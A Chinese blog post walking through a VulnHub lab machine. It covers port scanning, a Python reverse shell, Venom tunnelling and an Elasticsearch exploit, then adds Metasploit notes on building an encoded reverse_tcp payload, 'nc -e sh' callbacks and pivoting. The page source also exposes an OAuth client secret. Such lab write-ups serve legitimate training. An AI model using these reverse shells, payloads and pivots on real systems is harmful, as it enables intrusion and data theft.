<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>vulnhub-medium_socnet | isum</title>
  <meta name="keywords" content=" 内网穿透 ">
  <meta name="description" content="vulnhub-medium_socnet | isum">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="一、信息收集与初始攻击​1、配置靶机网络环境 启动靶机时按住shift键，直至出现grub界面，然后按e键，进入编辑模式,找到ro, 并将ro修改为rw single init&#x3D;&#x2F;bin&#x2F;bash 按下Ctrl键+X键，此时进入单一用户模式 ip a 查看当前网卡信息 修改网卡文件，修改上面的网卡 vim &#x2F;etc&#x2F;network&#x2F;int">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub-medium_socnet">
<meta property="og:url" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/index.html">
<meta property="og:site_name" content="isum">
<meta property="og:description" content="一、信息收集与初始攻击​1、配置靶机网络环境 启动靶机时按住shift键，直至出现grub界面，然后按e键，进入编辑模式,找到ro, 并将ro修改为rw single init&#x3D;&#x2F;bin&#x2F;bash 按下Ctrl键+X键，此时进入单一用户模式 ip a 查看当前网卡信息 修改网卡文件，修改上面的网卡 vim &#x2F;etc&#x2F;network&#x2F;int">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/1.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/2.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/3.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/4.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/5.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/6.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/7.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/8.png">
<meta property="og:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/10.png">
<meta property="article:published_time" content="2025-05-10T12:51:34.000Z">
<meta property="article:modified_time" content="2025-05-10T12:52:14.040Z">
<meta property="article:author" content="isum">
<meta property="article:tag" content="内网穿透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ehzisum.github.io/2025/05/10/vulnhub-medium-socnet/1.png">


<link rel="icon" href="/img/avater3.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avater3.jpg"/>
</a>
<div class="author">
    <span>isum</span>
</div>

<div class="icon">
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(10)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="漏洞复现">
            
            漏洞复现
            <small>(4)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="渗透靶机">
            
            渗透靶机
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="ctf">
            
            ctf
            <small>(4)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="other">
            
            other
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  site_url"
               
               href="/about">关于</a>
        
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="10">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://kaikaix.github.io/">kaikaix</a></li>
            
            <li><a target="_blank" href="https://nicolee278.github.io/">nicolee278</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>路径处理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网穿透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>输入验证</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>groovy</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>java</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 渗透靶机 "
           href="/2025/05/10/vulnhub-medium-socnet/"
           data-tag="内网穿透"
           data-author="" >
            <span class="post-title" title="vulnhub-medium_socnet">vulnhub-medium_socnet</span>
            <span class="post-date" title="2025-05-10 20:51:34">2025/05/10</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E2%EF%BC%88CVE-2024-45507%EF%BC%89/"
           data-tag="groovy,路径处理,ssrf"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz历史漏洞2（CVE-2024-45507）">春秋云镜-Apache OFBiz历史漏洞2（CVE-2024-45507）</span>
            <span class="post-date" title="2025-05-08 11:03:19">2025/05/08</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/07/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-GeoServer-%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2024-36401%EF%BC%89/"
           data-tag="输入验证,java"
           data-author="" >
            <span class="post-title" title="春秋云镜-GeoServer 前台代码执行漏洞（CVE-2024-36401）">春秋云镜-GeoServer 前台代码执行漏洞（CVE-2024-36401）</span>
            <span class="post-date" title="2025-05-07 10:34:46">2025/05/07</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E/"
           data-tag="groovy,路径处理"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz历史漏洞">春秋云镜-Apache OFBiz历史漏洞</span>
            <span class="post-date" title="2025-05-06 18:19:22">2025/05/06</span>
        </a>
        
        
        <a  class="全部文章 漏洞复现 "
           href="/2025/05/05/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-Apache-OFBiz%E8%B7%AF%E5%BE%84%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2024-36104%EF%BC%89/"
           data-tag="groovy,路径处理"
           data-author="" >
            <span class="post-title" title="春秋云镜-Apache OFBiz路径遍历漏洞（CVE-2024-36104）">春秋云镜-Apache OFBiz路径遍历漏洞（CVE-2024-36104）</span>
            <span class="post-date" title="2025-05-05 22:19:14">2025/05/05</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ESmarty%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Smarty注入全面指南">SSTI-php模板引擎Smarty注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:12:27">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-Java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-Java模板注入全面指南">SSTI-Java模板注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:03:16">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-python%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8EJinja2%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-python模板引擎Jinja2注入全面指南">SSTI-python模板引擎Jinja2注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:02:31">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ETwig%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Twig注入全面指南">SSTI-php模板引擎Twig注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:01:02">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 other "
           href="/2024/04/26/hello-world/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="Hello World">Hello World</span>
            <span class="post-date" title="2024-04-26 11:03:00">2024/04/26</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-vulnhub-medium-socnet" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">vulnhub-medium_socnet</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="渗透靶机">渗透靶机</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">内网穿透</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2025-05-10 20:52:14'>2025-05-10 20:51</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B8%8E%E5%88%9D%E5%A7%8B%E6%94%BB%E5%87%BB%E2%80%8B"><span class="toc-text">一、信息收集与初始攻击​</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1%E3%80%81%E9%85%8D%E7%BD%AE%E9%9D%B6%E6%9C%BA%E7%BD%91%E7%BB%9C%E7%8E%AF%E5%A2%83"><span class="toc-text">1、配置靶机网络环境</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2%E3%80%81%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-text">2、主机发现</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3%E3%80%81%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%EF%BC%8C%E6%9C%8D%E5%8A%A1%E6%8E%A2%E6%B5%8B"><span class="toc-text">3、端口扫描，服务探测</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4%E3%80%81web%E6%9C%8D%E5%8A%A1%E6%8E%A2%E6%B5%8B"><span class="toc-text">4、web服务探测</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E3%80%81Docker-%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8%E4%B8%8E%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E2%80%8B"><span class="toc-text">二、Docker 容器逃逸与内网穿透​</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#5%E3%80%81%E7%A1%AE%E8%AE%A4-Docker-%E7%8E%AF%E5%A2%83%E2%80%8B%E2%80%8B"><span class="toc-text">5、确认 Docker 环境​​</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#6%E3%80%81%E2%80%8B%E2%80%8B%E5%86%85%E7%BD%91%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0%E2%80%8B"><span class="toc-text">6、​​内网主机发现​</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#7%E3%80%81%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7%E6%90%AD%E5%BB%BA"><span class="toc-text">7、代理工具搭建</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%E2%80%8B"><span class="toc-text">三、内网横向渗透​</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#8%E3%80%81%E5%86%85%E7%BD%91%E6%9C%BA%E5%99%A8%E7%AB%AF%E5%8F%A3%E6%9C%8D%E5%8A%A1%E6%8E%A2%E6%B5%8B"><span class="toc-text">8、内网机器端口服务探测</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#9%E3%80%81%E2%80%8B%E2%80%8BElasticsearch-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E2%80%8B%E2%80%8B%EF%BC%9A"><span class="toc-text">9、​​Elasticsearch 漏洞利用​​：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#10%E3%80%81%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3%E4%B8%8E-SSH-%E7%99%BB%E5%BD%95%E2%80%8B%EF%BC%9A"><span class="toc-text">10、密码破解与 SSH 登录​：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%EF%BC%88%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%EF%BC%89"><span class="toc-text">四、本地提权（内核漏洞）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%94%E3%80%81%E8%A1%A5%E5%85%85"><span class="toc-text">五、补充</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#msf%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-text">msf的使用</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="一、信息收集与初始攻击​"><a href="#一、信息收集与初始攻击​" class="headerlink" title="一、信息收集与初始攻击​"></a>一、信息收集与初始攻击​</h3><h5 id="1、配置靶机网络环境"><a href="#1、配置靶机网络环境" class="headerlink" title="1、配置靶机网络环境"></a>1、配置靶机网络环境</h5><ul>
<li>启动靶机时按住shift键，直至出现grub界面，然后按e键，进入编辑模式,找到ro, 并将ro修改为rw single init&#x3D;&#x2F;bin&#x2F;bash<img src="/2025/05/10/vulnhub-medium-socnet/1.png" class=""></li>
<li>按下Ctrl键+X键，此时进入单一用户模式</li>
<li>ip a 查看当前网卡信息</li>
<li>修改网卡文件，修改上面的网卡 vim &#x2F;etc&#x2F;network&#x2F;interfaces<img src="/2025/05/10/vulnhub-medium-socnet/2.png" class=""></li>
<li>重启</li>
</ul>
<h5 id="2、主机发现"><a href="#2、主机发现" class="headerlink" title="2、主机发现"></a>2、主机发现</h5><p>nmap -sn 10.10.8.0&#x2F;8（-sn比-sP尝试更多的协议）<br>发现10.10.8.21为新增加的IP，即为靶机IP<br>（攻击ip为10.10.8.11）</p>
<h5 id="3、端口扫描，服务探测"><a href="#3、端口扫描，服务探测" class="headerlink" title="3、端口扫描，服务探测"></a>3、端口扫描，服务探测</h5><p>nmap -p- -sT -sV -A -O 10.10.8.21<br>-sT指定以tcp协议进行扫描，-sV探测服务版本，-O探测操作系统的版本<br>（端口扫描：nmap -p- 10.10.8.21  服务探测：nmap -p22,5000 -sT -sV -O 10.10.8.21）</p>
<img src="/2025/05/10/vulnhub-medium-socnet/3.png" class="">
<img src="/2025/05/10/vulnhub-medium-socnet/4.png" class="">
<img src="/2025/05/10/vulnhub-medium-socnet/5.png" class="">
<h5 id="4、web服务探测"><a href="#4、web服务探测" class="headerlink" title="4、web服务探测"></a>4、web服务探测</h5><ul>
<li>访问 <a href="http://10.10.8.21:5000，发现输入框并尝试代码注入，无果">http://10.10.8.21:5000，发现输入框并尝试代码注入，无果</a></li>
<li>目录爆破找到 &#x2F;admin 路径，可以执行python代码（<code>dirb http://10.10.8.21:5000</code>）</li>
<li>反弹shell</li>
</ul>
<pre><code class="bash">nc -lvvp 8889

import os,pty,socket;s=socket.socket();s.connect((&quot;10.10.8.11&quot;,8889));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(&quot;sh&quot;)
</code></pre>
<img src="/2025/05/10/vulnhub-medium-socnet/6.png" class="">

<h3 id="二、Docker-容器逃逸与内网穿透​"><a href="#二、Docker-容器逃逸与内网穿透​" class="headerlink" title="二、Docker 容器逃逸与内网穿透​"></a>二、Docker 容器逃逸与内网穿透​</h3><h5 id="5、确认-Docker-环境​​"><a href="#5、确认-Docker-环境​​" class="headerlink" title="5、确认 Docker 环境​​"></a>5、确认 Docker 环境​​</h5><p>查看ip地址发现是172.17.0.3<br>检查根目录的 &#x2F;.dockerenv 文件或&#x2F;proc&#x2F;1&#x2F;cgroup内容，确认处于容器内</p>
<h5 id="6、​​内网主机发现​"><a href="#6、​​内网主机发现​" class="headerlink" title="6、​​内网主机发现​"></a>6、​​内网主机发现​</h5><p>编写脚本扫描 Docker 网段：</p>
<pre><code class="bash">for i in $(seq 1 10);do ping -c 1 172.17.0.$i;done
//seq函数功能是输出连续数字，-c 命令指执行次数
</code></pre>
<p>存在：172.17.0.1，172.17.0.2，172.17.0.3</p>
<img src="/2025/05/10/vulnhub-medium-socnet/7.png" class="">
<h5 id="7、代理工具搭建"><a href="#7、代理工具搭建" class="headerlink" title="7、代理工具搭建"></a>7、代理工具搭建</h5><p>使用 ​<strong>​Venom​</strong>​ 建立隧道：</p>
<ol>
<li>Kali 启动服务端：</li>
</ol>
<pre><code class="bash">cd /Venom v1.1.0
chmod 777 admin_linux_x64
./admin_linux_x64 -lport 8889
</code></pre>
<ol start="2">
<li>靶机下载客户端：</li>
</ol>
<pre><code class="bash">wget http://&lt;Kali_IP&gt;:8890/agent_linux_x64
chmod 777 agent_linux_x64
mv agent_linux_x64 ag
./ag -rhost &lt;Kali_IP&gt; -rport 8889
</code></pre>
<p>成功连接</p>
<img src="/2025/05/10/vulnhub-medium-socnet/8.png" class="">

<ol start="3">
<li>为攻击机配置 proxychains全局代理（socks5 127.0.0.1 8887）</li>
</ol>
<pre><code class="bash">//在本地开启一个socks侦听的代理
goto 1
(node 1) &gt;&gt;&gt; socks 8887

//使用proxychains挂载代理
sudo apt-get install proxychains4
vim /etc/proxychains4.conf
：socks5 127.0.0.1 8887
proxychains ping 172.17.0.1 //成功ping通
</code></pre>
<h3 id="三、内网横向渗透​"><a href="#三、内网横向渗透​" class="headerlink" title="三、内网横向渗透​"></a>三、内网横向渗透​</h3><h5 id="8、内网机器端口服务探测"><a href="#8、内网机器端口服务探测" class="headerlink" title="8、内网机器端口服务探测"></a>8、内网机器端口服务探测</h5><p>172.17.0.1<br>端口：proxychains nmap -Pn -sT 172.17.0.1<br>服务：proxychains nmap -Pn -sT -sV 172.17.0.1<br>-Pn参数：当使用nmap扫描内网主机时，使用-Pn参数可以禁用主机的Ping扫描，这意味着即使主机没有响应ping请求，nmap仍然会尝试扫描该主机。这对于检测隐藏主机或防火墙阻止ping扫描的情况非常有用<br>经确认172.17.0.1为宿主机</p>
<p>172.17.0.2<br>端口：proxychains nmap -Pn -sT 172.17.0.2<br>服务：proxychains nmap -Pn -sT -sV 172.17.0.2<br>在9200端口上运行了Elasticsearch服务</p>
<h5 id="9、​​Elasticsearch-漏洞利用​​："><a href="#9、​​Elasticsearch-漏洞利用​​：" class="headerlink" title="9、​​Elasticsearch 漏洞利用​​："></a>9、​​Elasticsearch 漏洞利用​​：</h5><p>searchsploit elasticsearch<br>proxychains python 36337.py 172.17.0.2</p>
<h5 id="10、密码破解与-SSH-登录​："><a href="#10、密码破解与-SSH-登录​：" class="headerlink" title="10、密码破解与 SSH 登录​："></a>10、密码破解与 SSH 登录​：</h5><p>在容器3内找到 &#x2F;passwords文件，解密 MD5 哈希（john:1337hack），通过 SSH 登录宿主机的普通用户<br>ssh <a href="mailto:&#x6a;&#111;&#x68;&#110;&#x40;&#49;&#57;&#x32;&#x2e;&#x31;&#x36;&#x38;&#46;&#x32;&#x36;&#46;&#x31;&#x33;&#56;">&#x6a;&#111;&#x68;&#110;&#x40;&#49;&#57;&#x32;&#x2e;&#x31;&#x36;&#x38;&#46;&#x32;&#x36;&#46;&#x31;&#x33;&#56;</a>   </p>
<h3 id="四、本地提权（内核漏洞）"><a href="#四、本地提权（内核漏洞）" class="headerlink" title="四、本地提权（内核漏洞）"></a>四、本地提权（内核漏洞）</h3><p>后面再补充</p>
<h3 id="五、补充"><a href="#五、补充" class="headerlink" title="五、补充"></a>五、补充</h3><h5 id="msf的使用"><a href="#msf的使用" class="headerlink" title="msf的使用"></a>msf的使用</h5><img src="/2025/05/10/vulnhub-medium-socnet/10.png" class="">

<ul>
<li>生成木马文件：</li>
</ul>
<pre><code class="bash">msfvenom -payloads
msfvenom1 -l payloads | grep windows
msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -1 5 LHOST=192.168.18.22 LPORT=4444 -f exe &gt;/root/muma.exe
</code></pre>
<ul>
<li>监听：</li>
</ul>
<pre><code class="bash">use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
exploit-j/run 开启监听
//查看监听到的会话，并将该会话以Meterpreter会话的形式显示
</code></pre>
<ul>
<li><p>会话调优：<br>使用会话前set SessionCommunicationTimeout 0<br>（在使用会话前需要进行简单的调优。输入命令background，将当前的Meterpreter会话放置到后台，然后输入命令set SessionCommunicationTimeout 0。如果一个会话在5分钟之内没有做任何事情，将会被杀死，而将SessionCommunicationTimeout的值修改为0可以避免这种情况。还需要注意的是，Meterpreter会话会在一周后会被强制关闭，可以输入命令set SessionExpirationTimeout 0，修改为永不关闭。）</p>
</li>
<li><p>会话命令：<br>sysinfo，ipconfig，getuid，getsystem，use -l 使用扩展插件</p>
</li>
<li><p>nc shell转交至msf中：</p>
</li>
</ul>
<pre><code class="bash">use exploit/multi/handler
set payload/cmd/unix/reverse_lua
show options
set lhost 0.0.0.0
set lport 8890
exploit

nc 10.10.8.11 8890 -e sh
sessions -u 4 （Upgrade Command Shell to Meterpreter）
</code></pre>
<ul>
<li>msf进行端口扫描</li>
</ul>
<pre><code class="bash">run autoroute -s 172.17.0.0/24 //加指向路由
run autoroute -p //查看当前添加的路由
use auxiliary/scanner/portscan/tcp 
set rhosts 172.17.0.1-172.17.0.254 
set ports 1-10000 
run
</code></pre>
<ul>
<li>为了方便后续渗透，建立一条SOCKS_5的代理</li>
</ul>
<pre><code class="bash">search socks_proxy 
use auxiliary/server/socks_proxy
run
jobs
</code></pre>

      
       <hr><span style="font-style: italic;color: gray;"> 梦里小镇落雨，开花，起风，挂霜，甚至扬起烤红薯的香气，每个墙角都能听见人们的说笑声。 </span>
    </div>
</article>





    <div id="comments"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script type="text/javascript">
    $.getScript('/js/gitalk.js', function () {
        var gitalk = new Gitalk({
            clientID: '3730732a738faf14fdef',
            clientSecret: '4b7d5f3ee2f01c82c5a658dab63ca47202db57d9',
            repo: 'issues',
            owner: 'ehzisum',
            admin: ['ehzisum'],
            id: decodeURI(location.pathname),
            distractionFreeMode: 'true',
            language: 'zh-CN',
            perPage: parseInt('10',10)
        })
        gitalk.render('comments')
    })
</script>




    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    落雨，开花，起风，挂霜
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 18px 3px 15px 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
